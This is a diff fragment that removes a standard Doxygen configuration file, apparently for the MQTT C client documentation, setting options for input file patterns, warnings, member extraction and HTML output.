-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = YES
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = 
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = YES
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = NO
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = YES
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = YES
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = YES
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = NO
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = YES
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_internal
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-INPUT                  = "."
-
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          = *.cc \
-                         *.cxx \
-                         *.cpp \
-                         *.c++ \
-                         *.d \
-                         *.java \
-                         *.ii \
-                         *.ixx \
-                         *.ipp \
-                         *.i++ \
-                         *.inl \
-                         *.h \
-                         *.hh \
-                         *.hxx \
-                         *.hpp \
-                         *.h++ \
-                         *.idl \
-                         *.odl \
-                         *.cs \
-                         *.php \
-                         *.php3 \
-                         *.inc \
-                         *.m \
-                         *.mm \
-                         *.dox \
-                         *.py \
-                         *.f90 \
-                         *.f \
-                         *.vhd \
-                         *.vhdl \
-                         *.C \
-                         *.CC \
-                         *.C++ \
-                         *.II \
-                         *.I++ \
-                         *.H \
-                         *.HH \
-                         *.H++ \
-                         *.CS \
-                         *.PHP \
-                         *.PHP3 \
-                         *.M \
-                         *.MM \
-                         *.PY \
-                         *.F90 \
-                         *.F \
-                         *.VHD \
-                         *.VHDL \
-                         *.c
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
